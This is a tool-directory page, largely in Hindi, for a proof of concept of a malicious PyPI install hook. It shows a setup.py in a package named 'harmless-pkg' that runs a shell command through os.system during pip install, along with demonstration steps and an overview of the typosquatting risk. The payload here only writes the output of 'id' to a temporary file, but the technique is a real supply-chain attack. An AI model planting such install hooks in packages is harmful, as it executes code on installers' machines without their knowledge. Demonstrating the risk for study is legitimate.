Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-21016-Malicious-PyPI-Package-Install-Hook-setup.py-Execution- — दर्शाता है कि कैसे एक दुर्भावनापूर्ण Python पैकेज pip install के दौरान setup.py के माध्यम से मनमाने कमांड निष्पादित करता है, जो PyPI सप्लाई चेन और typosquatting जोखिमों को उजागर करता है। | Kitploit
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-21016-malicious-pypi-package-install-hook-setup.py-execution-
शोषणआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षापेलोड डेवलपमेंटप्रतिकूल हमला
GitHubgeorge0papasotiriou/cve-2026-21016-malicious-pypi-package-install-hook-setup.py-execution-

CVE-2026-21016-Malicious-PyPI-Package-Install-Hook-setup.py-Execution-

दर्शाता है कि कैसे एक दुर्भावनापूर्ण Python पैकेज pip install के दौरान setup.py के माध्यम से मनमाने कमांड निष्पादित करता है, जो PyPI सप्लाई चेन और typosquatting जोखिमों को उजागर करता है।

रिपॉजिटरी देखें
181 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-21016 – दुर्भावनापूर्ण PyPI पैकेज इंस्टॉल हुक (setup.py निष्पादन)

प्रोग्राम कोड (Python)

# setup.py - Malicious package that executes during install
from setuptools import setup
import os

# This runs on pip install
os.system('id > /tmp/pwned_by_package')

setup(
    name='harmless-pkg',
    version='1.0',
    packages=[],
)

CVE-2026-21016 – दुर्भावनापूर्ण PyPI पैकेज इंस्टॉल हुक (setup.py)

Severity: Critical

अवलोकन

एक PyPI पैकेज अपने setup.py में मनमाना कोड शामिल कर सकता है, जो pip install के दौरान निष्पादित होता है। एक हमलावर किसी लोकप्रिय पैकेज के समान नाम वाला पैकेज प्रकाशित कर सकता है (typosquatting) और स्थापना पर, पेलोड उपयोगकर्ता के विशेषाधिकारों के साथ चलता है, जिससे रिमोट कोड निष्पादन होता है।

भेद्यता विवरण

  • प्रकार: आपूर्ति श्रृंखला हमला / कोड निष्पादन
  • प्रभाव: सिस्टम से समझौता, क्रेडेंशियल चोरी।
  • मूल कारण: Pip setup.py को बिना सैंडबॉक्सिंग के निष्पादित करता है, जिससे पैकेजों को पूर्ण पहुंच मिलती है।

शोषण प्रदर्शन

  1. दिए गए setup.py के साथ दुर्भावनापूर्ण पैकेज निर्देशिका बनाएँ।
  2. इसे स्थानीय रूप से इंस्टॉल करें:
    pip install ./harmless-pkg
    
    
  3. आउटपुट जाँचें:
    cat /tmp/pwned_by_package
    

id कमांड निष्पादित किया गया।

टूल डाउनलोड करें